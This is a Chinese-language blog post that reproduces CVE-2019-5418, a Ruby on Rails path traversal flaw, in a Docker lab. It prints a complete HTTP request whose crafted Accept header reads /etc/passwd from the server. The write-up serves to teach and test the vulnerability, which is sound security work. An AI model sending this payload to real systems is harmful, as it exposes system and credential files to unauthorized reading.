CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞
2021/12/15 22:13:00
本文主要是介绍CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
漏洞简介
在控制器中通过render file
形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: ../../../../../../../../etc/passwd{{
头来构成构造路径穿越漏洞,读取任意文件。
环境搭建
执行如下命令编译及启动Rail On Rails 5.2.2:
docker-compose build docker-compose up -d
环境启动后,访问http://your-ip:3000
即可看到Ruby on Rails的欢迎页面。
可以看到端口
漏洞复现
访问http://127.0.0.1:3000/robots/
可见,正常的robots.txt文件被读取出来。
一定要抓到robots的数据包
将Accept数据修改为一下
../../../../../../../../etc/passwd{{
利用漏洞,发送如下数据包,读取/etc/passwd
:
GET /robots/ HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: ../../../../../../../../etc/passwd{{ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close
成功读取:
这篇关于CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升
- 2024-05-08代码报错不用愁,CodeGeeX一键完成代码修复、错误解释的功能上线了!
- 2024-05-08今天开始程序员不用再发愁写commit message了,全部由CodeGeeX自动完成!